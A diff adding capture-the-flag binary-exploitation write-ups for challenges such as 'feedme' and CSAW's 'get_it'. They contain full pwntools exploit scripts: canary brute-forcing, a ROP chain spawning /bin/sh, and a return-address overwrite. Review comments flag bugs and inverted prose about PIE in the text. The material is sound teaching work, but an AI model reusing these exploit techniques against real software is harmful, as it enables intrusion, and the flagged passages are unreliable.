+ → ROPgadget --binary feedme| grep ": pop ecx ; pop ebx ; ret$"
+ 0x0806f371 : pop ecx ; pop ebx ; ret
+
+
+
+The last gadget we found is so that we can control the value of the ecx register. Unfortunately there are no gadgets that will just pop a value into the ecx and just return, so this is the next best thing, which will save us not having to use another gadget when we pop a value into the ebx register.
+
+Now that we have gadgets for eax, edx, ecx:
+
+
+
+Now we need a gadget for the ebx register because this one will be needed to contain our **/bin/sh** string
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → ROPgadget --binary feedme| grep "int 0x80$"
+ 0x080941d3 : add bh, al ; inc ebp ; test byte ptr [ecx], dl ; add byte ptr [eax], al ; int 0x80
+ 0x0804975f : add byte ptr [eax], al ; int 0x80
+ 0x0806ceb0 : add byte ptr [eax], al ; mov eax, edi ; mov ecx, 0x81 ; int 0x80
+ 0x0806ceb1 : add byte ptr [ecx + 0x81b9f8], cl ; add byte ptr [eax], al ; int 0x80
+ 0x0806cf3c : add dword ptr [eax], eax ; add byte ptr [eax], al ; int 0x80
+ 0x0806f428 : clc ; mov ecx, 0x80 ; int 0x80
+ 0x0806ceb3 : clc ; mov ecx, 0x81 ; int 0x80
+ 0x080941d5 : inc ebp ; test byte ptr [ecx], dl ; add byte ptr [eax], al ; int 0x80
+
+ **0x08049761 : int 0x80**
+
+
+
+Here we see that at **0x08049761** is a gadget that enables us to make a syscall to the kernel to get a shell. in x86, you can just call int 0x80. Syscall will expect 3 arguments as detailed below:
+
+
+ eax : 11 # SYSCALL ID
+ ebx : bss addr 0x80eb928 # address of the command
+ ecx : 0x0
+ edx : 0x0
+
+
+So now with this we get our ROP Chain:
+
+
+ # This is to write the string '/bin' to the bss address 0x80eb928. Since this is 32 bit, registers can only hold 4 bytes, so we can only write 4 characters at a time
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x6e69622f) # /bin string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Write the second half of the string '/bin/sh' the '/sh' to 0x80eb928 + 0x4
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928 + 0x4) # bss address + 0x4 to write after '/bin'
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x0068732f) # /sh string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Now that we have the string '/bin/sh' written to 0x80eb928, we can load the appropriate values into the eax, ecx, edx, and ebx registers and make the syscall.
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0xb) # 11
+ payload += p32(0x0806f371) # pop ecx ; pop ebx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x8049761) # syscall
+
+
+
+And we get our full exploit here:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → vim exploit.py
+
+
+
+
+ # This is based off of a Raytheon SI Govs talk
+
+ # First we import pwntools
+ from pwn import *
+
+ # Here is the function to brute force the canary
+ def breakCanary():
+ # We know that the first byte of the stack canary has to be \x00 since it is null terminated, keep the values we know for the canary in known_canary
+ known_canary = "\x00"
+ # Ascii representation of the canary
+ hex_canary = "00"
+ # The current canary which will be incremented
+ canary = 0x0
+ # The number of bytes we will give as input
+ inp_bytes = 0x22
+ # Iterate 3 times for the three bytes we need to brute force
+ for j in range(0, 3):
+ # Iterate up to 0xff times to brute force all posible values for byte
+ for i in xrange(0xff):
+ log.info("Trying canary: " + hex(canary) + hex_canary)
+
+ # Send the current input size
+ target.send(p32(inp_bytes)[0])
+
+ # Send this iterations canary
+ target.send("0"*0x20 + known_canary + p32(canary)[0])
+
+ # Scan in the output, determine if we have a correct value
+ output = target.recvuntil("exit.")
+ if "YUM" in output:
+ # If we have a correct value, record the canary value, reset the canary value, and move on
+ print "next byte is: " + hex(canary)
+ known_canary = known_canary + p32(canary)[0]
+ inp_bytes = inp_bytes + 1
+ new_canary = hex(canary)
+ new_canary = new_canary.replace("0x", "")
+ hex_canary = new_canary + hex_canary
+ canary = 0x0
+ break
+ else:
+ # If this isn't the canary value, increment canary by one and move onto next loop
+ canary = canary + 0x1
+
+ # Return the canary
+ return int(hex_canary, 16)
+
+ # Start the target process
+ target = process('./feedme')
+ #gdb.attach(target)
+
+ # Brute force the canary
+ canary = breakCanary()
+ log.info("The canary is: " + hex(canary))
+
+
+ # Now that we have the canary, we can start making our final payload
+
+ # This will cover the space up to, and including the canary
+ payload = "0"*0x20 + p32(canary)
+
+ # This will cover the rest of the space between the canary and the return address
+ payload += "1"*0xc
+
+ # Start putting together the ROP Chain
+
+ # This is to write the string '/bin' to the bss address 0x80eb928. Since this is 32 bit, registers can only hold 4 bytes, so we can only write 4 characters at a time
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x6e69622f) # /bin string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Write the second half of the string '/bin/sh' the '/sh' to 0x80eb928 + 0x4
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0x80eb928 + 0x4) # bss address + 0x4 to write after '/bin'
+ payload += p32(0x0806f34a) # pop edx
+ payload += p32(0x0068732f) # /sh string in hex, in little endian
+ payload += p32(0x0807be31) # mov dword ptr [eax], edx ; ret
+
+ # Now that we have the string '/bin/sh' written to 0x80eb928, we can load the appropriate values into the eax, ecx, edx, and ebx registers and make the syscall.
+ payload += p32(0x080bb496) # pop eax ; ret
+ payload += p32(0xb) # 11
+ payload += p32(0x0806f371) # pop ecx ; pop ebx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x80eb928) # bss address
+ payload += p32(0x0806f34a) # pop edx ; ret
+ payload += p32(0x0) # 0x0
+ payload += p32(0x8049761) # syscall
+
+ # Send the amount of bytes for our payload, and the payload itself
+ target.send("\x78")
+ target.send(payload)
+
+ # Drop to an interactive shell
+ target.interactive()
+
+
+
+Now let's see if it works:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/feed]
+ → python2 exploit.py
+ [+] Starting local process './feedme': pid 208854
+ [*] Trying canary: 0x000
+ [*] Trying canary: 0x100
+ [*] Trying canary: 0x200
+ [*] Trying canary: 0x300
+ [*] Trying canary: 0x400
+ [*] Trying canary: 0x500
+ [*] Trying canary: 0x600
+ [*] Trying canary: 0x700
+ [*] Trying canary: 0x800
+ [*] Trying canary: 0x900
+ [*] Trying canary: 0xa00
+ [*] Trying canary: 0xb00
+ [*] Trying canary: 0xc00
+ [*] Trying canary: 0xd00
+ [*] Trying canary: 0xe00
+ [*] Trying canary: 0xf00
+
+ [...]
+
+ [*] Trying canary: 0x7d5cc000
+ [*] Trying canary: 0x7e5cc000
+ [*] Trying canary: 0x7f5cc000
+ [*] Trying canary: 0x805cc000
+ [*] Trying canary: 0x815cc000
+ [*] Trying canary: 0x825cc000
+ [*] Trying canary: 0x835cc000
+ [*] Trying canary: 0x845cc000
+ [*] Trying canary: 0x855cc000
+ [*] Trying canary: 0x865cc000
+ [*] Trying canary: 0x875cc000
+ [*] Trying canary: 0x885cc000
+ [*] Trying canary: 0x895cc000
+ [*] Trying canary: 0x8a5cc000
+ [*] Trying canary: 0x8b5cc000
+ [*] Trying canary: 0x8c5cc000
+ [*] Trying canary: 0x8d5cc000
+ next byte is: 0x8d
+ [*] The canary is: 0x8d5cc000
+ [*] Switching to interactive mode
+
+ FEED ME!
+ ATE 30303030303030303030303030303030...
+ $ id
+ uid=1000(nothing) gid=1000(nothing) groups=1000(nothing),90(network),98(power),972(libvirt),988(storage),990(optical),995(audio),998(wheel)
+ $ cat flag.txt
+ flag{g0ttem_b0yz}
+ $ exit
+
+
+
+And that's it ! We have been able to spawn a shell and print the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
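Review bot: the canary brute force in exploit.py, `for i in xrange(0xff):`, only tries values 0x00 through 0xfe, so a canary byte equal to 0xff is never found and the outer loop moves on to the next byte with `canary` left at 0xff and `known_canary` not extended; make it `xrange(0x100)` to match the 256 values the prose counts. In the same function `hex_canary = new_canary + hex_canary` is built from `hex(canary)` with the `0x` stripped, which gives a single hex digit for any byte below 0x10 (the log line `Trying canary: 0x000` is this formatting at work), so the returned `int(hex_canary, 16)` and hence the final `p32(canary)` would be misaligned for such a byte; the bytes accumulated in `known_canary` via `p32(canary)[0]` are correct and are the safer source for the final payload (or zero-pad with `"%02x" % canary`). Two prose fixes in this region: 'the elf does have PIE set to enabled which randomizes the address of code, Therefore building a ROP chain without an infoleak is possible' inverts the argument, since the hard-coded gadget and .bss addresses (0x080bb496, 0x80eb928) only work because PIE is disabled, and 'with the stack canary, we have the ability to overwrite the return address' should read 'with the buffer overflow'. Also `FUN_0806cbe0(local_14,&local;_1c,0)` in the decompiled listing is an HTML-entity artifact for `&local_1c`, 'one byte a a time' and 'wec ould' are typos, and the two trailing `## Title` / `text` / `` ` ![]() `` sections after 'And that's it !' are unfilled template that should be dropped before merge.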
diff --git a/2/get.md b/2/get.md
new file mode 100644
index 0000000..299227e
--- /dev/null
+++ b/2/get.md
@@ -0,0 +1,309 @@
+# CSAW 2018 Get It
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/getit]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw18_getit/get_it
+ --2021-02-27 14:55:14-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/05-bof_callfunction/csaw18_getit/get_it
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw18_getit/get_it [following]
+ --2021-02-27 14:55:15-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/05-bof_callfunction/csaw18_getit/get_it
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8744 (8.5K) [application/octet-stream]
+ Saving to: ‘get_it’
+
+ get_it 100%[=======================================================================================================================================================================================================>] 8.54K --.-KB/s in 0s
+
+ 2021-02-27 14:55:15 (36.0 MB/s) - ‘get_it’ saved [8744/8744]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/getit]
+ → file get_it
+ get_it: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=87529a0af36e617a1cc6b9f53001fdb88a9262a2, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/getit]
+ → chmod +x get_it
+
+
+` ![]()
+
+## Solution
+
+first we start by executing the binary to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → ./get_it
+ Do you gets it??
+ maybe
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → ./get_it
+ Do you gets it??
+ yes
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → pwn checksec get_it
+ [*] '/home/nothing/binexp/2/get/get_it'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+
+It prints text, and then asks for our input. This is a 64 bit binary with a non-executable stack. Let's check it from inside ghidra:
+
+
+
+The binary really has a simplistic code for the main function:
+
+
+ undefined8 main(void)
+
+ {
+ char local_28 [32];
+
+ puts("Do you gets it??");
+ gets(local_28);
+ return 0;
+ }
+
+
+
+So our input text is given to the local_28 variable which can hold 32 characters, and it is being passed through a gets function, and as we saw in the previous binary, the gets function is not secure because it does not know a limit, there is no size restriction for the data that gets scanned in, it will simply scan in data until it gets either a newline character or an EOF. Because of this we can write more data to our input text variable (local_28) than it can hold.
+
+Looking at the other functions of this binary, we see that there is another function that's there to spawn a shell for us:
+
+
+
+
+ void give_shell(void)
+
+ {
+ system("/bin/bash");
+ return;
+ }
+
+
+From here it's safe to assume that the goal is to find a way to spawn a shell thanks to the give_shell function. Since we know the gets function does not have an upper limit, so our goal is to overwrite the return function at the end, so that we can do what we want with it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → gdb ./get_it
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./get_it...
+ (No debugging symbols found in ./get_it)
+ gef➤ disas main
+ Dump of assembler code for function main:
+ 0x00000000004005c7 <+0>: push rbp
+ 0x00000000004005c8 <+1>: mov rbp,rsp
+ 0x00000000004005cb <+4>: sub rsp,0x30
+ 0x00000000004005cf <+8>: mov DWORD PTR [rbp-0x24],edi
+ 0x00000000004005d2 <+11>: mov QWORD PTR [rbp-0x30],rsi
+ 0x00000000004005d6 <+15>: mov edi,0x40068e
+ 0x00000000004005db <+20>: call 0x400470
+ 0x00000000004005e0 <+25>: lea rax,[rbp-0x20]
+ 0x00000000004005e4 <+29>: mov rdi,rax
+ 0x00000000004005e7 <+32>: mov eax,0x0
+ 0x00000000004005ec <+37>: call 0x4004a0
+ 0x00000000004005f1 <+42>: mov eax,0x0
+ 0x00000000004005f6 <+47>: leave
+ 0x00000000004005f7 <+48>: ret
+ End of assembler dump.
+ gef➤ b *0x4005f1
+ Breakpoint 1 at 0x4005f1
+ gef➤ r
+
+
+Here we set our first breakpoint right after the gets call, so let's run the binary and give it a pattern easy to remember:
+
+
+
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/get/get_it
+ Do you gets it??
+ 13371337
+
+ Breakpoint 1, 0x00000000004005f1 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x00007fffffffe0e0 → "13371337"
+ $rbx : 0x0
+ $rcx : 0x00007ffff7fac980 → 0x00000000fbad2288
+ $rdx : 0x0
+ $rsp : 0x00007fffffffe0d0 → 0x00007fffffffe1f8 → 0x00007fffffffe4de → "/home/nothing/binexp/2/get/get_it"
+ $rbp : 0x00007fffffffe100 → 0x0000000000400600 → <__libc_csu_init+0> push r15
+ $rsi : 0x31373333
+ $rdi : 0x00007ffff7faf680 → 0x0000000000000000
+ $rip : 0x00000000004005f1 → mov eax, 0x0
+ $r8 : 0x00007fffffffe0e0 → "13371337"
+ $r9 : 0x0
+ $r10 : 0x6e
+ $r11 : 0x246
+ $r12 : 0x00000000004004c0 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0d0│+0x0000: 0x00007fffffffe1f8 → 0x00007fffffffe4de → "/home/nothing/binexp/2/get/get_it" ← $rsp
+ 0x00007fffffffe0d8│+0x0008: 0x0000000100000000
+ 0x00007fffffffe0e0│+0x0010: "13371337" ← $rax, $r8
+ 0x00007fffffffe0e8│+0x0018: 0x0000000000400400 → add BYTE PTR [rax], al
+ 0x00007fffffffe0f0│+0x0020: 0x00007fffffffe1f0 → 0x0000000000000001
+ 0x00007fffffffe0f8│+0x0028: 0x0000000000000000
+ 0x00007fffffffe100│+0x0030: 0x0000000000400600 → <__libc_csu_init+0> push r15 ← $rbp
+ 0x00007fffffffe108│+0x0038: 0x00007ffff7e14d0a → <__libc_start_main+234> mov edi, eax
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x4005e4 mov rdi, rax
+ 0x4005e7 mov eax, 0x0
+ 0x4005ec call 0x4004a0
+ ●→ 0x4005f1 mov eax, 0x0
+ 0x4005f6 leave
+ 0x4005f7 ret
+ 0x4005f8 nop DWORD PTR [rax+rax*1+0x0]
+ 0x400600 <__libc_csu_init+0> push r15
+ 0x400602 <__libc_csu_init+2> push r14
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "get_it", stopped 0x4005f1 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4005f1 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+
+
+no need to search for the pattern, we see that our pattern appears at $rax ( 0x00007fffffffe0e0 )
+
+
+ gef➤ i f
+ Stack level 0, frame at 0x7fffffffe110:
+ rip = 0x4005f1 in main; saved rip = 0x7ffff7e14d0a
+ Arglist at 0x7fffffffe100, args:
+ Locals at 0x7fffffffe100, Previous frame's sp is 0x7fffffffe110
+ Saved registers:
+ rbp at 0x7fffffffe100, rip at 0x7fffffffe108
+
+
+
+here we see that the return address is stored at 0x7fffffffe108, lets verify that our pattern is at the address we found above:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[heap]'(0x602000-0x623000), permission=rw-
+ 0x6026b0 - 0x6026ba → "13371337\n"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe0e0 - 0x7fffffffe0e8 → "13371337"
+
+
+and it is! now we need to calculate the offset between 0x00007fffffffe0e0 and 0x7fffffffe108
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/get]
+ → python3
+ Python 3.9.1+ (default, Feb 5 2021, 13:46:56)
+ [GCC 10.2.1 20210110] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffe0e0 - 0x7fffffffe108 )
+ '-0x28'
+
+
+So we get a 0x28 byte offset which is 40 bytes in decimal, basically we need to write 40 bytes worth of input, and then we can write over the return address. Tis address will be executed when the ret instruction is executed, which will give us code execution. We need the address of the give_shell function which we get from ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined give_shell()
+ undefined AL:1
+ give_shell XREF[3]: Entry Point(*), 004006bc,
+ 00400758(*)
+ 004005b6 55 PUSH RBP
+
+
+
+now that we know that we need 40 bytes of input, and then the address 0x004005b6, we can create our payload:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/get]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+ import sys
+
+ target = process("./get_it")
+
+ payload = b""
+ payload += b"\x00" * 0x28
+ payload += p64(0x4005b6)
+
+
+ target.sendline(payload)
+
+ target.interactive()
+
+
+
+
+Basically with this exploit.py we create a payload that has 40 nullbytes (0x28 in hexa) and then contains the address of the give_shell function, so let's see if it works:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/get]
+ → python3 exploit.py
+ [+] Starting local process './get_it': pid 244402
+ [*] Switching to interactive mode
+ Do you gets it??
+ $ w
+ 21:07:19 up 1 day, 22:20, 3 users, load average: 0.16, 0.14, 0.06
+ USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+ nothing pts/1 tmux(6724).%3 16:42 6.00s 18.38s 0.15s python3 exploit.py
+ nothing pts/3 tmux(6724).%4 19:14 45:07 0.88s 0.04s less
+ nothing pts/4 tmux(6724).%5 19:21 3:35 2.46s 2.46s -zsh
+
+
+
+and that's it! we have been able to spawn a shell with the binary file.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
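Review bot: 'our goal is to overwrite the return function at the end' and 'Tis address will be executed when the ret instruction is executed' should read 'return address' and 'This address' (the `ret` pops the address and continues execution there; the address itself is not executed). The offset reasoning is consistent with the listing (`lea rax,[rbp-0x20]` for `local_28`, and `rbp at 0x7fffffffe100, rip at 0x7fffffffe108` in `i f`, hence 0x28 bytes), but 'Since we know the gets function does not have an upper limit, so our goal is' has a dangling 'so', and 'in hexa' should be 'in hex'. In exploit.py `import sys` is unused and can go. Housekeeping: the lone `` ` ![]() `` closing the download section has no image to go with it, and the two trailing `## Title` / `text` placeholder sections after 'and that's it!' are leftover template; both should be removed before merge.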
diff --git a/2/hs.md b/2/hs.md
new file mode 100644
index 0000000..cd8012d
--- /dev/null
+++ b/2/hs.md
@@ -0,0 +1,389 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/hs19_storytime/core
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/hs19_storytime/libc.so.6
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/hs19_storytime/storytime
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → file storytime
+ storytime: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=3f716e7aa7e236824c52ed0410c1f14739919822, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → chmod +x storytime ; ls -lash
+ total 4.1M
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Mar 7 10:27 .
+ 4.0K drwxr-xr-x 13 nothing nothing 4.0K Mar 7 10:26 ..
+ 2.3M -rw-r--r-- 1 nothing nothing 2.3M Mar 7 10:26 core
+ 1.8M -rw-r--r-- 1 nothing nothing 1.8M Mar 7 10:27 libc.so.6
+ 12K -rwxr-xr-x 1 nothing nothing 8.3K Mar 7 10:27 storytime
+
+
+
+` ![]()
+
+## Solution
+
+First of all let's run pwn checksec on the binary and then run it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → pwn checksec storytime
+ [*] '/home/nothing/binexp/2/hs/storytime'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → ./storytime
+ HSCTF PWNNNNNNNNNNNNNNNNNNNN
+ Tell me a story:
+ yes
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → ./storytime
+ HSCTF PWNNNNNNNNNNNNNNNNNNNN
+ Tell me a story:
+ no
+
+
+
+So we have a 64 bit dynamically linked binary that has a Non-Executable stack (NX), it prints out some text, and then prompts us for input. Let's view it inside of ghidra:
+
+
+
+We get the following disassembled code:
+
+
+ undefined8 main(void)
+
+ {
+ undefined local_38 [48];
+
+ setvbuf(stdout,(char *)0x0,2,0);
+ write(1,"HSCTF PWNNNNNNNNNNNNNNNNNNNN\n",0x1d);
+ write(1,"Tell me a story: \n",0x12);
+ read(0,local_38,400);
+ return 0;
+ }
+
+
+
+Our input text gets passed into a read() call, and we can pass in 400 bytes of data into the local_38 variable even though it was initially declared to be able to hold only 48 bytes. So this means that we have our buffer overflow right here. There is no stack canary, so nothing stops us from executing code, now what will we execute ? When we look under the imports in Ghidra, we see the following imported functions:
+
+
+
+So this means that we can call any of these functions, Since the ELF is dynamically linked, we don't have alot of gadgets. First we will need to get a libc infoleak with a **write** function that writes to stdout (1) and then loops back again to a vulnerable read call to overwrite the return address with a [onegadget](https://github.com/david942j/one_gadget), which is a ROP gadget that can be found in the libc, that can potentially spawn a shell. Now we need to know what the libc version is, we can view it from gdb with the **vmmap** command.
+
+
+
+Here we want to set the first breakpoint after the read call at **0x4x4x4x40069c** , so we can locate where our text is:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → gdb ./storytime
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./storytime...
+ (No debugging symbols found in ./storytime)
+ gef➤ b *0x40069c
+ Breakpoint 1 at 0x40069c
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/hs/storytime
+ HSCTF PWNNNNNNNNNNNNNNNNNNNN
+ Tell me a story:
+ 13371337
+
+ Breakpoint 1, 0x000000000040069c in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x00000000004006a0 → <__libc_csu_init+0> push r15
+ $rcx : 0x00007ffff7ebd052 → 0x5677fffff0003d48 ("H="?)
+ $rdx : 0x190
+ $rsp : 0x00007fffffffdf38 → 0x00007ffff7df4b25 → <__libc_start_main+213> mov edi, eax
+ $rbp : 0x0
+ $rsi : 0x00007fffffffdf00 → 0x3733333137333331 ("13371337"?)
+ $rdi : 0x0
+ $rip : 0x000000000040069c → ret
+ $r8 : 0x0
+ $r9 : 0x00007ffff7fdc070 → <_dl_fini+0> endbr64
+ $r10 : 0xfffffffffffffb87
+ $r11 : 0x246
+ $r12 : 0x00000000004004d0 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdf38│+0x0000: 0x00007ffff7df4b25 → <__libc_start_main+213> mov edi, eax ← $rsp
+ 0x00007fffffffdf40│+0x0008: 0x00007fffffffe028 → 0x00007fffffffe358 → "/home/nothing/binexp/2/hs/storytime"
+ 0x00007fffffffdf48│+0x0010: 0x00000001f7fca000
+ 0x00007fffffffdf50│+0x0018: 0x000000000040062e → push rbp
+ 0x00007fffffffdf58│+0x0020: 0x00007fffffffe339 → 0x61b7180f2454c920
+ 0x00007fffffffdf60│+0x0028: 0x00000000004006a0 → <__libc_csu_init+0> push r15
+ 0x00007fffffffdf68│+0x0030: 0x7140ad8a61b88017
+ 0x00007fffffffdf70│+0x0038: 0x00000000004004d0 → <_start+0> xor ebp, ebp
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400691 call 0x4004b0
+ 0x400696 mov eax, 0x0
+ 0x40069b leave
+ ●→ 0x40069c ret
+ ↳ 0x7ffff7df4b25 <__libc_start_main+213> mov edi, eax
+ 0x7ffff7df4b27 <__libc_start_main+215> call 0x7ffff7e0c820
+ 0x7ffff7df4b2c <__libc_start_main+220> mov rax, QWORD PTR [rsp]
+ 0x7ffff7df4b30 <__libc_start_main+224> lea rdi, [rip+0x164729] # 0x7ffff7f59260
+ 0x7ffff7df4b37 <__libc_start_main+231> mov rsi, QWORD PTR [rax]
+ 0x7ffff7df4b3a <__libc_start_main+234> xor eax, eax
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "storytime", stopped 0x40069c in main (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x40069c → main()
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
